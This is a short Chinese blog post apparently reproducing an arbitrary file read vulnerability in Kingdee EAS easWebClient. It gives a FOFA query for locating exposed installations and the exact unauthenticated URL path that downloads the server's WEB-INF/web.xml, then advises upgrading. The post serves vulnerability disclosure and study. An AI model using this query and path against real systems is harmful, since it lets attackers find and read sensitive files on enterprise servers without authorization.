金蝶-EAS easWebClient 任意文件读取漏洞复现

明丨通 2024-07-05 12:33:24 阅读 67

前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、产品简介

金蝶-EAS是一款面向大中型企业的管理软件,涵盖了财务、人力资源、采购、库存等多个功能模块,支持云计算和个性化定制,适合集团企业管理使用。

二、漏洞描述

金蝶EAS easWebClient 接口存在任意文件读取漏洞,未经授权的攻击者通过该漏洞读取任意文件,获取系统敏感信息。

三、影响范围

未知

四、复现环境

FOFA:

<code>body="easSessionId" || header="easportal" || header="eassso/login" || banner="eassso/login" || body="/eassso/common" || (title="EAS系统登录" && body="金蝶")code>

五、漏洞复现

1.访问存在漏洞的网站

在这里插入图片描述

在这里插入图片描述

2.直接访问ip+port/easWebClient/deploy/client/ctrlhome/webapps/extweb/WEB-INF/web.xml即可下载文件

3.成功

在这里插入图片描述

六、修复建议

官方已修复该漏洞,请及时升级到最新版本。

<code>https://www.kingdee.com/




声明

本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。